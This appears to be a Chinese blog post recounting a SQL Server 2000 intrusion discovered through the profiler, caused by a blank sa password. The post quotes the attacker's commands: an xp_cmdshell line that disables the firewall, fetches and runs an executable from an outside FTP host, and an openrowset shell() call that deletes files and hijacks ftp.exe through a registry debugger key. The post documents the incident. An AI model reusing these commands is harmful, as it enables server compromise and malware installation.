SQLServer遭遇入侵

本来正在使用Eclipse的断点调试结合事件探查器观察一些SQL语句的执行,
突然发现很奇怪的现象,在没有执行任何语句的时候,事件探查器不断打印出SQLServer服务器的执行记录。

粗看一下,发现这样的语句:

select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cmd /c attrib -s -h wbem\we.exe&del wbem\we.exe&del X.EXE&reg delete HKEY_CLASSES_ROOT\WScript.Shell /f&reg delete HKEY_CLASSES_ROOT\WScript.Shell.1 /f&reg delete HKEY_CLASSES_ROOT\Wifayy /f&reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\currentversion\image file execution options\ftp.exe /v Debugger /t REG_SZ /d ctfmon.exe /f")')
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword


而且还正在不停的执行,由于是今天刚重新装好的电脑以及SQL2000,没有设置sa密码。没有安装杀毒软件,
赶快把服务器停掉、把网络断掉。

首先检查一下,任务管理器多出来的进程:

[img]http://dl.iteye.com/upload/attachment/474028/8839b892-1359-346e-a084-3565750afd09.jpg[/img]

在C盘上搜索了一下最新的文件,大概多出了:
c:\cmd.exe
c:\windows\system32\cmd 没有扩展名,打开是一个文本文件,内容是:
open 2yxy.8800.org
123
123
binary
get 1.exe C:\cmd.exe
bye

c:\windows\system32\1.exe 图标是JPG文件的图标,属性写的是QQ2010,毫无疑问是病毒伪装的
c:\windows\system32\c.exe
还有好几个文件。太可恨了!!

使用AutoRuns查了一下,多出来的自动启动的服务:
[img]http://dl.iteye.com/upload/attachment/474035/e36f5837-c623-39fa-be1a-c704cc28d560.jpg[/img]

现在把事件探查器的记录结果记在下面,有时间再分析吧:


exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'
exec xp_cmdshell 'cmd.exe /c net stop sharedaccess&@echo open 2yxy.8800.org> cmd&@echo 123>> cmd&@echo 123>> cmd&@echo binary >> cmd&@echo get 1.exe C:\cmd.exe>> cmd&@echo bye >> cmd&ftp -s:cmd &C:\cmd.exe&del cmd /q /f&ping -n 3 127.0.0.1>nul&del C:\cmd.exe /f'
SELECT N'Testing Connection...'
EXECUTE msdb.dbo.sp_sqlagent_get_perf_counters
-- sp_sqlagent_get_perf_counters
CREATE TABLE #temp
(
performance_condition NVARCHAR(1024) COLLATE database_default NOT NULL
)
-- sp_sqlagent_get_perf_counters
INSERT INTO #temp VALUES (N'dummy')


太多了,不再记录了,跟踪记录保存下来了。

对了对方的ApplicationName是ISQL-32

真是火大了,TNND!!!
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值